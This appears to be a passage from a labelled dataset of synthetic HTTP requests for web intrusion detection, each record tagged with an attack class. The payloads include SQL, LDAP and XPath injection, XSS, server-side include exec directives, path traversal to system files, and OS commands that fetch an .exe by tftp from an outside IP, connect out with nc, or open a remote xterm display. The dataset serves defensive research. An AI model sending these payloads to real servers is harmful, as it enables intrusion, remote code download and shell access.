If-Range: Fri, 02 Apr 10 21:17:52 GMT
Max-Forwards: 39
MIME-Version: 2.3
Pragma: xt=sRlstd
Authorization: tUmcn a4hk=n4Iui
Referer: http://uoati.ch/mra7iBd/Ouur/ttoei/vurEe.exe
TE: gzip;q=0.2
User-Agent: Mozilla/4.4 (compatible; Konqueror/1.1; Unix; z4ehsy)
UA-Pixels: 828x8678
Via: HTTP/5.6 38.93.68.245:063, 4.4 www.nenTz.gif
Transfer-Encoding: compress
Upgrade: oix4/9.4, hl1rd/5.1, jsHtts/4.7
Warning: 518 181.124.206.103:336 "aaIai6i" "Thu, 24 Feb 05 13:04:27 UTC"

null

End - Id: 43460
Start - Id: 46388
class: PathTransversal
GET /ntmebkkcyvindu/nrtmp1bodyBVf/script3hforqQCZwHiwz5/mYH.aspx?liodhrl8ior7a=iistnOb9dt3ehsEn&mete=oSnnc&cd=xnv98.xDYY&uJmr=iOetjseL&oajdoJhIniLmctB=76948&kqs=rid&4vDkhD=o%3A%2F.htaccess%7E&vSoeeNl=y%3B&rCGi=57&aaeeen=ed%27&en=83249&oveah=975&jaod=791&NiberaOe=idfyia%2F%40 HTTP/1.1
Host: 154.199.203.221
Connection: ya1hiac
Accept: */*
Accept-Charset: windows-1253, windows-1253;q=0.6, isiri-3342;q=0.1, x-mac-ce;q=0.4, utf-8
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: min-fresh=682
Client-ip: 230.204.6.13
Cookie: ste6=aFS;aGlh4R7ieslr=inEnombl7j
Cookie2: $Version="1"
Date: Wed, 23 Jul 08 11:19:07 GMT
ETag: "5SK-T2XgyVaARjP62O"
Expect: 100-continue
From: ladasd@didtoeUsr.uk
If-Modified-Since: Fri, 16 Jul 04 01:14:50 UTC
If-Unmodified-Since: Sun, 22 Aug 04 09:23:32 UTC
If-Match: "-5G43@R4xEAX8Ap"
If-None-Match: "ZEvCD@QUg8SiH@BPGeQ"
If-Range: Wed, 21 Jan 09 24:46:36 GMT
Max-Forwards: 5
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM bXQ0aTZtczlyc2llb3dEc25rcTFoZHNoaUVnUHRvYW5kRWV0
Authorization: Digest qop=la8es
Range: 1-64988,874604-47420,9842-4
Referer: /ytdfjuda/shde.cfm
TE: deflate,chunked
Trailer: Cache-Control
User-Agent: Mozilla/0.7 (X11; U; Unix 2.5; fe-se; rv:8.7.5) Gecko/63834832
UA-CPU: MIPS
UA-Disp: 637,7292,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 3216x516
Via: 3.5 176.191.74.65:2838, uod/4.7 217.215.74.199
Transfer-Encoding: gzip
Upgrade: nri/5.0, rree/0.5, msno/4.0
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 241.79.66.180
X-Serial-Number: 0730634231485
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46388
Start - Id: 39479
class: SSI
PUT /ifFaN/4.oce56U@w/jPHj0-DvaBLwg/gpmdu3iBKzcVY/rEdjbL.HKn1HgG-Bxa/.psJphpsock_stream_vnacK3.tiff? HTTP/1.1
Content-Length: 266
Content-Language: eisntnt8,vtsee,ooo
Content-Encoding: gzip
Content-MD5: NW9lOXNqYWlvd1IxdXAydA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 29 Jul 06 16:30:36 CET
Last-Modified: Thu, 12 Oct 06 21:44:00 GMT
Host: www.htjkoosui.cz
Connection: close
Accept: */*
Accept-Charset: x-mac-ce;q=0.4, windows-1251;q=0.5, x-mac-ce, euc-tw;q=0.0, iso-8859-4
Accept-Encoding: compress
Accept-Language: <!--#exec     cgi="/cgi-bin/script?odtobos"   -->
Client-ip: 166.82.15.88
Cookie: rTeie0dftl=32825546;aPnesmhaab95otb=nrIztiedrrbne8wt;seecdh=61473;umoaqRsn=988118;tlcl2fRcees=mn;rorei=hedocumentE
Date: Wed, 07 Apr 04 06:58:40 UTC
If-Modified-Since: Fri, 12 Jun 09 02:01:32 UTC
If-Unmodified-Since: Thu, 18 Mar 10 07:25:13 CET
If-None-Match: *
If-Range: "twPA2llLPL3UC5BIbfZ_"
Max-Forwards: 7
Pragma: a8faGx='m3'
Authorization: Basic MHRiemM6anJjbg==
Referer: /IePje6.gif
User-Agent: u8odNi/8.8
Via: zwee/5.7 131.71.223.76
Upgrade: 8eah/2.0, a9oO/5.6

q2@Ucopyf5STc2m=xz@&ufr5eenitt8o=sFWEjJ_7SgB&uy1dkafrh8vslih=nwRetz&PFq5lGC9execJ=axNQ_WYm&jEptdeys=618972&hraao=MLgO/e$e&uRnaNlc=rs&l5to=ee+i>-oR%i nkqxbm5&n6iwf=2880130&1enstrorgs=9072816&k6053=itsotf\es4&k9tein3s=eef(&asIts7a=lB2aXM9j6VT7&ny=99358

End - Id: 39479
Start - Id: 48016
class: XSS
GET /nsiygrp6a/eY1cfgl@OpEBf/7P9JxNZfw/bandjU/eolvpynn6nanowihmag/7zRZ-/s5cNDotau/td.htm?Eiosaaean=%3Cscript++++%3Ealert%28%27eou.oiuEh%27%29%3C%2Fscript+++%3E&lr=re0s&echbo97maeMrR3s=s07E&aesoet9elo7fi4=034&shtt5S5wrieepD=caddjltaL3elhteaao&ei4veylhbhoia=mur&j3Oit=+ee&esidolrdeyhAt=tEg6n%2B7halrelch%25ihra&1jx_acceptyRkGKjF=eceidx5atig3&sjnneii=bc&MC7IVXYAT=n3l&gl=yGai HTTP/1.1
Host: www.lwDeoini.org
Connection: u5sKnnAc
Accept: */*;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.8
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 2.173.165.120
Cookie: gsbwco3HngexL=c.c;re7rlehirn5ae=iBvCl;t3rue=ii6Tge8ne;ertosE1erylet=rItK7cZb
Cookie2: $Version="114"
Date: Mon, 15 Nov 04 11:17:55 UTC
ETag: "BlsvYpWARYasK9-v"
Expect: 100-continue
From: uesois@ewrsoxtt.it
If-Modified-Since: Mon, 04 Feb 08 23:34:44 GMT
If-Unmodified-Since: Fri, 18 Jul 08 01:01:47 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 740
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: uedrde k86eh=jiih
Authorization: Basic bmxhaWtFZmc6dG5iZ25kbw==
Range: 5-,0-4,-81
Referer: /NSror8/iasmnh/itotaees/wrtnter.exe
TE: trailers,deflate;q=0.2,trailers
Trailer: Cache-Control
User-Agent: Tayle1/5.7.8.6.8
UA-CPU: 68000
UA-Disp: 212,5646,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9754x5278
Via: 1.7 www.5tsdnTl.htm, 0.6 www.ds1etee.jpeg:3, HTTP/4.5 www.ee46s.tiff
Transfer-Encoding: gzip
Upgrade: mtenw/7.3, ootl0/6.0, ncmojI/8.6
Warning: 237 106.180.134.229 "4e4socieooaey" "Fri, 14 Dec 07 11:55:14 UTC"
X-Forwarded-For: 186.104.154.65
X-Serial-Number: 698729021
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 48016
Start - Id: 39446
class: SSI
GET /2Dxpasswd1/rPtgnwxehI6r/sIMGjJeiUYdGm_1/euzcjhhjItghf.exe?sds3eittestth=719&yaE4ooti=hnis&h1n7taafi=ikg&Wv=1358930&ot6oesi5eo=55945&NpVconnectw=33&Wz-8FDdbodyd9kM=%3C%21--%23email+fromhost%3D%22www.LobhtmTE.com%22+tohost%3D%22mailbox.aMuti.com%22+message%3D%22xmfrwe+vdcuet+ha8f+lirw0%22+fromaddress%3D%22ge537.com%22+toaddress%3D%22dtlu.ieina.com%22+subject%3D%22r%22+sender%3D%22sW.com%22+replyto%3D%22anhhqs.com%22+cc%3D%22jheh%22+inreplyto%3D%22oT0g+wic+ei%22+id%3D%227tntnmail%22+--%3E&lh=Rie+l0aa%7Cqbrcp6-olib+ HTTP/1.1
Host: 229.37.203.84:80
Connection: tcrmoa
Accept: */*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.5, gzip;q=0.1, compress;q=0.3, identity
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 179.178.240.191
Cookie: unoEblouhsns=W-tphpz;rrl=9eexnaw
Cookie2: $Version="52"
Date: Tue, 23 Mar 10 23:26:29 GMT
ETag: "4RA_nX6hXk.ECNzh8"
Expect: 100-continue
From: alitInca@hE8o0.it
If-Modified-Since: Tue, 17 Oct 06 20:57:49 UTC
If-Unmodified-Since: Tue, 02 Oct 07 22:55:07 GMT
If-Match: *
If-None-Match: "ez4kgak4gfDr-36P"
If-Range: Sat, 11 Apr 09 11:39:49 GMT
Max-Forwards: 2
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: rashN riiam=cssstki
Authorization: Basic YWRkZTpkYWVpcmU=
Range: 993-
Referer: /rihr/t5eRbomd/etnhh.pdf
TE: chunked,gzip;q=0.5
Trailer: Warning
User-Agent: kateh (wxBFr7; nlElTZ@N; nVPZA3N; y01Quchf)
UA-CPU: Sparc
UA-Disp: 677,8714,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 015x2523
Via: HTTP/4.7 42.83.191.95, FTP/8.2 www.iahnhoe.css, 5.7 227.235.237.166:8485
Transfer-Encoding: rdrdd
Upgrade: nSr/8.2, bkiiH/4.4, thru4/6.0
Warning: 799 37.15.16.235:0423 "eauhqipdaedde" "Thu, 30 Aug 07 24:57:07 CET"
X-Forwarded-For: 38.112.178.33
X-Serial-Number: 298841177786
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39446
Start - Id: 42133
class: SqlInjection
GET /oizfrZHOSlyRQ/drZmcuTQy1t/gmdnsOetlnndaea9/elLQZ961QgdA95z/neai/nheToiaminhebgul/hsNq4My4pdJ-oWz@/vTqCCstylexconnect_p2X4..php?bpai=%27++%29+++UN%2F**%2FION++++ALL+++++SEL%2F**%2FECT+++++%27i2rl%27%2C633%2C0947%2C%27eh%27%2C9++FROM+++2g6iu+++WHERE++%28++%27%27++++%3D++%27 HTTP/1.1
Host: www.kisbnl.cz:1659
Connection: aroedtDb
Accept: video/*;q=0.8, video/quicktime;q=0.3, video/*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: 5zr4aiti-youiDoew, ths-aCldpT, dnDehm-0ptsh5lu, p-eeia, ta5-hh3sTegn;q=0.3
Cache-Control: Ml2tar='rl'
Client-ip: 56.112.127.62
Cookie: ta6rbcvehhnec=o8an;ga6gna=7gI;1TmoergmIshnc=inwo-VuSrJp;ie8z0iuStr=2469336;tentren1crnedai=whglET:m0se;nd3u4h=4
Cookie2: $Version="9"
Date: Fri, 16 Apr 04 04:08:01 UTC
ETag: W/"g@9KH0sEjAkNzF2r"
Expect: ahiWkN=nO6ei
From: yaieolw@dAieet.st
If-Modified-Since: Sun, 05 Oct 08 03:30:10 UTC
If-Unmodified-Since: Thu, 15 Apr 10 02:01:11 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 18 Aug 05 04:25:51 CET
Max-Forwards: 465
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest nc=95C88C7A
Range: 80-3804,023297-91,09-
Referer: /wds90l/4plm/ndiacne.pdf
TE: trailers
Trailer: Range
User-Agent: Mozilla/7.1 (Windows; U; Win98 8.7; hi-tt; rv:0.4.0) Gecko/68287328
UA-CPU: StrongARM
UA-Disp: 1126,087,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 929x052
Via: 4.7 194.221.73.223
Transfer-Encoding: deflate
Upgrade: dct/0.8, isti/6.6, rDb4l/1.0
Warning: 210 www.mTetdThm.shtml "LTt1suesam" "Fri, 22 Feb 08 23:40:02 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 45705
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42133
Start - Id: 38415
class: LdapInjection
GET /gmNqOy_I05/lyA/tgtn9hohambehtsnahEl/tWeArC2pMNlpgCiD/SzTt/diA/mmJkfPh-jSEJgaKLp/t-kb8/horrhN/eYGSUs8NpC_liaPU/tsa7afa/o-4NpYIWhlEuCQ4ri.asmx?httttiadna4oi=0637808&ntc=qj%29%28+++%7C%28dbd6%3D*%29&avrhrihlnnapnoi=cYl3Zxl&scoo=8&w38iwh7uiookt=%7Cie HTTP/1.1
Host: www.1haasreh8C.fr:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8;q=0.4, us-ascii
Accept-Encoding: 
Accept-Language: sxtl3tpn-so9a
Cache-Control: no-cache
Client-ip: 206.10.185.166
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="17"
Date: Wed, 09 Feb 05 10:51:46 CET
ETag: "wl@UfNXB1fE.YUPM_nzA"
Expect: 100-continue
From: r8urdpH@atna.uk
If-Modified-Since: Thu, 21 Feb 08 21:32:12 CET
If-Unmodified-Since: Sat, 12 Mar 05 03:51:09 UTC
If-Match: "uHDclq5lEGLx96YOP"
If-None-Match: "NqZdmVjfMA5II.S"
If-Range: "tSZRnmZauSU55Gkw"
Max-Forwards: 7087
MIME-Version: 0.1
Pragma: 0Exugas0=deoEa
Proxy-Authorization: h80n hmasNo=a0xee
Authorization: etet5O wh5tR=jadthTlY
Range: -96373
Referer: /rjTol8s.txt
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: vnaaenrth4a
UA-CPU: MIPS
UA-Disp: 381,973,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0696x1408
Via: awt/6.2 www.2zire.gif, ewy/4.5 www.elue.png:591, 2.8 www.etssecve.jpeg
Transfer-Encoding: compress
Upgrade: Elgm/6.3, hea/6.4, She/5.1, dol/2.2
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38415
Start - Id: 40202
class: SSI
GET /aJnjstCRwLvaEchwscl.exe?ae=oLHebjGfAyxo&eefagqj=%3C%21--%23exec+++++cmd%3D%22%2Fbin%2Fls+-l++%2Fhome%2Fo92ehnu%2Fsmin%22++--%3E&4ru1nri4bt3=9394015&amncx1m=s-eue7ynVp&orlZF=403&2GJNFjV=amgpc&ioon8=sine%3F&1ogeoe=1289024 HTTP/1.1
Host: 38.188.154.23
Connection: close
Accept: */*;q=0.9
Accept-Charset: us-ascii, cp-932, cp-932, cp-936;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 151.249.122.44
Cookie2: $Version="808"
Date: Mon, 27 Mar 06 04:54:04 UTC
ETag: "h6GFeI6Xpx0R31tNI"
Expect: ystte=htertDv;cidygTg=edbp
If-Modified-Since: Fri, 06 Apr 07 18:10:45 UTC
If-Unmodified-Since: Sun, 22 Oct 06 17:56:36 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 04 Jun 07 17:29:15 UTC
Max-Forwards: 6
Pragma: no-cache
Proxy-Authorization: Basic M2l0bzplYXNo
Authorization: Digest algorithm=eb2rrtle
Referer: /iheyioPn/ay3rtdn/arsk.bin
User-Agent: emqnNtlaoa (ojb9_Z)
UA-Disp: 9617,113,16
UA-Color: color8
UA-Pixels: 3172x5893
Via: neq4d/5.4 www.ooada.htm, 0.2 www.Bhamo.jpg
Transfer-Encoding: deflate
Warning: 521 www.ath5rism.css "eawurun6gY" "Sun, 07 Dec 08 03:40:09 GMT"
----: -------------------------------

null

End - Id: 40202
Start - Id: 42939
class: OsCommanding
GET /9connectHtmpJVYQ_JvZscript/nfRhvidal3htnMr8p/sdneLren/a0M0z/ltoitTtirmlogw8H/hhcG9AKDwwyzpUEt/iunionzL@Pv8gzKJstdin/qlFvmdf/sFKGce/1aH9ru./dsRHmfue.css?GFBftpi3F0=468942969&M_Lddphpye-=8717137&wnn=nb6&tAm=hiazla3aoeflnitg&plnlrxaceen=854276&saTtveolkt6ih=iOyDqai4w8wn&WscVQ=pmt5bath&NeesENCitr=5627300&KcKa=62734&ag6blta=lb6CWC3&edEedAwm=tnthrwt8emAha80o HTTP/1.0
Host: 68.244.177.110:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: %0a    nc     www.islaineronol.com     80    ;
Cache-Control: max-age=6774
Client-ip: 226.241.221.163
Cookie: 2w07=5940;nSnhl=fHGuvr
Cookie2: $Version="866"
Date: Tue, 09 Mar 04 13:44:41 UTC
ETag: W/"TPazJN9VkdLe-HTD6v"
Expect: 100-continue
From: 3aheja@ties8On.biz
If-Modified-Since: Wed, 17 Jan 07 15:35:39 GMT
If-Unmodified-Since: Mon, 14 Jan 08 08:37:14 GMT
If-Match: *
If-Range: "cU71j9SvrBCVG8Jx6"
Max-Forwards: 6
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ihsrran"
Authorization: atago sztecibe=ef5eo3e
Range: 01418-88080,370072-
Referer: http://tmhh2.gov/twrpeeed.jpeg
TE: deflate
Trailer: Referer
User-Agent: \rxterm     -display  8.38.227.27:0.0
UA-CPU: PowerPC
UA-Disp: 810,554,16
UA-Color: color32
UA-Pixels: 512x475
Via: 5.0 55.98.52.230, taob/3.4 www.o0o4e.js, 3.0 www.i1bmt.tiff
Transfer-Encoding: compress
Upgrade: rts/3.1, eacx/4.9, rit/1.5, Wj7c/1.4
Warning: 513 www.cgtoaN.jpg "orin5gbEs" 
----: ------------------------------------------------

null

End - Id: 42939
Start - Id: 44376
class: OsCommanding
GET /backup/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.aag9mTwro.ch
Connection: a43a9ny
Accept: audio/*;q=0.4, audio/basic;q=0.3, application/*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: uOo-ta;q=0.5, s-a;q=0.3
Cache-Control: max-stale=388
Client-ip: 90.164.80.82
Cookie: X2ncYY=r 9elh ;trHxneed8rcdexd=shyduc8;sNevcNoc=226157693;stahhedmenlest=ek;sDaDe=]E
Cookie2: $Version="75"
Date: Fri, 22 Oct 04 19:02:11 UTC
ETag: "hRtyES0J8kvkJHkX"
Expect: sHulneie=8tshds;ergxc
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Sat, 15 Sep 07 08:50:35 UTC
If-Unmodified-Since: Sun, 14 Feb 10 15:30:07 GMT
If-Match: "T4zlc4FMAAGr3y8"
If-None-Match: *
If-Range: "4SoVXSAvOO8jfGxd"
Max-Forwards: 5
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: Digest qop=auth
Range: -592489
Referer: http://www.hpohn.cz/atenhmh.css
TE: trailers
Trailer: Cache-Control
User-Agent: t6AHH709 http://www.ali4trne.org
UA-CPU: Sparc
UA-Disp: 0327,603,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 347x4806
Via: 5.4 240.50.136.50:26, 5.6 www.4a0wid.css
Transfer-Encoding: identity
Upgrade: HeiarI/6.4, enio/6.7, DHqogf/0.4
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 16212196997401300
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44376
Start - Id: 36691
class: OsCommanding
POST /ukrzHv.nsf? HTTP/1.1
Content-Length: 124
Content-Language: 7,so0,cr
Content-Encoding: gzip
Content-MD5: ZnRHYjY2MmF1Z2hFdHQ1bw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 12 May 08 24:12:00 CET
Last-Modified: Thu, 07 Feb 08 17:55:08 UTC
Host: 34.142.46.187
Connection: neao1nn
Accept: text/*, application/rtf
Accept-Encoding: *
Accept-Language: *;q=0.4
Client-ip: 131.23.123.221
Date: Sat, 10 Mar 07 22:42:18 CET
If-Match: *
If-Range: Fri, 21 Dec 07 16:23:46 UTC
Max-Forwards: 9
Authorization: Basic TXpsbmNhYTp0dGFvNGNn
Referer: /R4re4/nwlhwnf/t5ynD/sieshiOl/bfi2o3s.pdf
User-Agent: nlennd (hVY@jSW-; ep3a-T10oT)
UA-CPU: StrongARM
UA-Pixels: 3045x1540
Via: 8.7 197.197.131.184
----: -------------------------

aeN32nwae=tftp   -c    get  66.68.180.239:/ortens/en.exe     |&bdiehcolh=r2eEjSsj5:c&cdnnnEckabtgRt=orhrrctsiadmin

End - Id: 36691
Start - Id: 36151
class: PathTransversal
GET /stneuaRehtdejtsedet/iucmb/T66uxy6/ede/omleervinTortr2tl9f/5llr/VfEVC@u0FG/Xgm_Ib7u/1zNq1N/totsdjdlhnStybstthe.php?TQCmVJ0ZvarHv=rlz%2F+7mrtTClocationbl&seiesz=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&asnth=msqEL HTTP/1.1
Host: 124.182.111.26
Connection: 0tktgwe
Accept: application/zip;q=0.9, audio/x-wav;q=0.8, video/*;q=0.7
Accept-Charset: euc-jp;q=0.6, isiri-3342, x-mac-arabic;q=0.1
Accept-Encoding: *
Accept-Language: onant-dec2nlrW, ds2otzz-nHMelomq, jcarlrb-o;q=0.1
Cache-Control: no-store
Client-ip: 52.138.136.254
Cookie: a7Mbtdoyo=Fskes
Cookie2: $Version="9"
Date: Thu, 03 Jan 08 06:06:46 UTC
ETag: W/"ns9fmDOQwg1@j3lH"
Expect: etoihr
From: aitunw@tegatgpn.uk
If-Modified-Since: Mon, 24 Jan 05 21:29:25 CET
If-Unmodified-Since: Mon, 16 Feb 04 22:03:01 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 17 Mar 10 02:18:20 GMT
Max-Forwards: 3336
MIME-Version: 8.6
Pragma: uaid3=inumsrod
Proxy-Authorization: Basic eWl1NWVlZTpIc3NkYWE=
Authorization: NTLM bWNoOHN4ZWh1bElpZWRrcmVsTWN0d2hpb2FiYXJldG92dWV1bnVvaQ==
Range: 375-
Referer: /NNtitnmo/Onetc.jpeg
TE: gzip;q=0.6,trailers
Trailer: Expect
User-Agent: EScb/3.2
UA-CPU: PowerPC
UA-Disp: 4342,924,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9880x9117
Via: FTP/9.0 www.nOahn9p.shtml:9684
Transfer-Encoding: compress
Upgrade: bhte/9.7, rertro/9.5
Warning: 211 www.cnett.htm "eObeoNe1e" "Sun, 12 Jun 05 24:16:59 UTC"
X-Forwarded-For: 27.217.111.45
X-Serial-Number: 6486734154619358
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36151
Start - Id: 49513
class: XPathInjection
GET /WjBCadminKn8fg3G/csnEtmbdo/s6H7Tkaw-syMOr.dll?KbZG.eb7v=j5aeooaje&9fwoegBtHoagn=211141&tisbs=197979&fsumu8rg=O7txgd3ahcts5ems&ecTl=945176&tl8Z=lhqsoeH9maoAyut&hryvaueeis=a0deletel&4us4qn=6YX%40&sStsEup=eY0Rbe&o6aaenith=sock_streamRnn&doelnczkera=69109589&Gujaaadkh7yDhb=esg9e+no&n3gatgkarhihyNa=p9gwxe%27+++or+++++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28++i%2B++++j%2Bk++%2B+++l++++%2B+1%29%5D+%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+++%27Apeytt%27%3D++++%27+At21t%27++++or&Stodhttrr=eoH80h&dcno=uga-4z HTTP/1.1
Host: 194.112.4.154:80
Connection: close
Accept: audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ilapnar-oolrqtod, txuqf-sde4fivi;q=0.6
Cache-Control: no-store
Client-ip: 202.44.218.0
Cookie: iettce5yihow=8;ClinkRadmin=28o;teneye6hhkst=qMMaB;OdNpur_e=680405795;ricbtwser=en;snjlatt=s8e@[ai
Cookie2: $Version="988"
Date: Thu, 11 Mar 04 18:35:54 CET
ETag: "yazn.m53BeI7lvtipfFN"
Expect: igeeah=za6rsomx;otXlia7e
From: eaatpaso@ksiwaan.org
If-Modified-Since: Tue, 20 Dec 05 08:58:22 GMT
If-Unmodified-Since: Wed, 17 Mar 10 23:13:04 CET
If-Match: "yrIQ92TyCN41oG5-D4hS"
If-None-Match: "jXfoYw5SlSwVNd7CGXV"
If-Range: *
Max-Forwards: 7
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: ao6tbr qsmelsdm=S7mcd8of
Authorization: Paadee rEj1hp=eheis8
Range: -88469
Referer: /ema6to9/Eaqit/oedjehp/enfg/stwtaC.conf
TE: gzip;q=0.2,gzip
Trailer: Date
User-Agent: Mozilla/7.7 (compatible; Konqueror/9.0; SunOS sun4u; tvaoreel)
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4726x3292
Via: i3l/7.4 92.76.229.198, Inx5f/1.2 www.te9N.jpg
Transfer-Encoding: identity
Upgrade: itnn/7.0, e8wien/4.6, 6sde2/3.7, niNg/1.6
Warning: 646 www.qqkiis.css "nsutrl9tXaNtumo" 
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 201583507
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49513
Start - Id: 45000
class: PathTransversal
GET /2ohaepeuveN/.wSFIxtermOQ1fA8N/Mno4Jg_J/ftbcmomxgeaIsa/@XMG_stdinSshutdownVZ1AOEx/mclhnew5inhop4nnnod/etSUF8K.RojZ4/iHBd.xRwBU/27JHuqO@5having/bitlza0xnozesxm4na.shtml?teTEinaattue=3386384867&dtl0nbwaasjpr=me6jHd9u&sWsystemn=r%3Ca8ym&ref=wtprhgsk&Lo8access_logrKAA=vietseoel7&es6rta=oety&37Dv5meta=3998591087&t3tmrsq4iiairk=%2F.%2F..%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F..%2F&pivshgaae=sk7en HTTP/1.0
Host: www.Omreor.net
Connection: tInr
Accept: audio/*;q=0.1
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: 3yor9-t9i;q=0.6, noqef-b;q=0.4, bobr9rld-jiiiof;q=0.1, d1ermwn-uubbvtyc;q=0.7, h3peayT-nwoo
Cache-Control: twnd=csJnaS
Cookie: 5botiedmb1nwiHd=4374
Cookie2: $Version="13"
Date: Thu, 20 Dec 07 12:33:48 CET
ETag: "06Aqq7j6Gd0C_dK"
Expect: geoa=c7iean2o
From: SiHai3@Rl2imga.fr
If-Modified-Since: Fri, 21 Mar 08 21:37:00 UTC
If-Unmodified-Since: Sat, 07 Jan 06 01:42:05 UTC
If-Match: *
If-None-Match: "mN62FTj-AKEOiZM"
If-Range: Mon, 27 Nov 06 04:36:53 CET
Max-Forwards: 8584
MIME-Version: 1.4
Pragma: osxui='s'
Proxy-Authorization: Basic b3RkdDJlYTc6bWlhVG41RUE=
Authorization: Basic cmdjaXJiYWw6UnRsdHA=
Referer: http://rta8l.gov/ltoa/Gg3b17ib/t8ccrm/o8dde/8rsV.mpg
TE: chunked;q=0.8,chunked;q=0.5,deflate;q=0.6
User-Agent: ketovrill/4.7
UA-CPU: MIPS
UA-Disp: 6840,695,32
UA-Pixels: 6392x1633
Via: 8.8 197.52.0.15:1, 8.2 179.204.73.161:620, 8.0 www.yreq.css
Transfer-Encoding: deflate
Upgrade: Eubq/3.7
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 45000
Start - Id: 38353
class: LdapInjection
GET /oU@/e9BCE_JAHSkKIq/httpsLDh/nsl/nselectm.-fEiframe/m8wT6hz58q9m/5brLVo0RmkM8ymYZvKZi/errhlstk/r-.hXQdY/passthruOt4mTJAn9/od9lretHpaawm6d.shtml?h5y=21&CJFFRP=47768849&Zw84b=afj&6@xOZhomeanda=s6C94%40tKMFs&uSynoEknxyRtg=%29+%28%7C%28displayName%3Dhad*%29++++%28name++%3Dhad*++%29%28++mail%3Dhad*++++%29&2atethe=a HTTP/1.0
Host: www.ldotzc.com
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-cyrillic, euc-tw
Accept-Encoding: 
Accept-Language: nI-7vaww3ri;q=0.0, Dvasd-o;q=0.5
Cache-Control: only-if-cached
Client-ip: 193.201.183.61
Cookie: enrentgr=89;e0rt3ayh=9n;eoynnsheeuer=ned9qlArsl
Cookie2: $Version="67"
Date: Thu, 29 Jul 04 05:12:12 GMT
ETag: W/"5LoC-V6hl1TUEpQHFV"
Expect: imesc=bd5Ni;kahealns=at3ue
From: 8hntrge@aiwetonej.uk
If-Modified-Since: Wed, 26 Aug 09 20:15:06 GMT
If-Unmodified-Since: Mon, 26 Apr 04 09:33:28 UTC
If-Match: "yzc6eQdiiKE7Bnon39"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest response="24bdDc9027Eaafbdb25b48aD0Bc2B85e"
Authorization: NTLM SHNkOG5lZ2E1bWgzNWlpZkhqdHNleXRTaW1sbkluM2N1ZW9PcnlSdQ==
Range: 0-190754,-136
